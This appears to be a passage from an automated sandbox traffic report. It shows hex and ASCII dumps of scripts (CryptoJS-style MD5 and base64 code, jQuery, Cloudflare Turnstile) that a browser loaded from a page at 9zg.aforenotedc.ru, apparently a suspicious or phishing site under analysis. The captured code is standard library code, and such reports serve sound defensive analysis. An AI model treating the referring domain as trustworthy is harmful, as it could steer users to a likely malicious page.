                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28
                                                                                  Data Ascii: i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d
                                                                                  Data Ascii: Length):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b
                                                                                  Data Ascii: 1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijk
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30
                                                                                  Data Ascii: MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0
                                                                                  2024-10-02 15:49:42 UTC1369INData Raw: 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32
                                                                                  Data Ascii: 0]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,2


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.449757151.101.2.1374433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:42 UTC536OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                  Host: code.jquery.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:42 UTC613INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  Content-Length: 89501
                                                                                  Server: nginx
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                  ETag: "28feccc0-15d9d"
                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 02 Oct 2024 15:49:42 GMT
                                                                                  Age: 1835153
                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740056-EWR
                                                                                  X-Cache: HIT, HIT
                                                                                  X-Cache-Hits: 5889, 2
                                                                                  X-Timer: S1727884182.467249,VS0,VE0
                                                                                  Vary: Accept-Encoding
                                                                                  2024-10-02 15:49:42 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                  2024-10-02 15:49:42 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                  2024-10-02 15:49:42 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                  2024-10-02 15:49:42 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                  2024-10-02 15:49:42 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                  2024-10-02 15:49:42 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.449756104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:42 UTC562OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:42 UTC356INHTTP/1.1 302 Found
                                                                                  Date: Wed, 02 Oct 2024 15:49:42 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d80c7db83314-EWR


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.449759184.28.90.27443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:42 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  Accept-Encoding: identity
                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                  Range: bytes=0-2147483646
                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                  Host: fs.microsoft.com
                                                                                  2024-10-02 15:49:42 UTC514INHTTP/1.1 200 OK
                                                                                  ApiVersion: Distribute 1.1
                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                  Content-Type: application/octet-stream
                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                  Server: ECAcc (lpl/EF06)
                                                                                  X-CID: 11
                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                  X-Ms-Region: prod-weu-z1
                                                                                  Cache-Control: public, max-age=89712
                                                                                  Date: Wed, 02 Oct 2024 15:49:42 GMT
                                                                                  Content-Length: 55
                                                                                  Connection: close
                                                                                  X-CID: 2
                                                                                  2024-10-02 15:49:42 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.449760104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:42 UTC561OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:43 UTC471INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:43 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 47262
                                                                                  Connection: close
                                                                                  accept-ranges: bytes
                                                                                  last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                  access-control-allow-origin: *
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d8103ab60f87-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-10-02 15:49:43 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                  Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                  Data Ascii: e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=nu
                                                                                  2024-10-02 15:49:43 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 72 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                  Data Ascii: ray$/.test(a))return rt(e,r)}}function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0
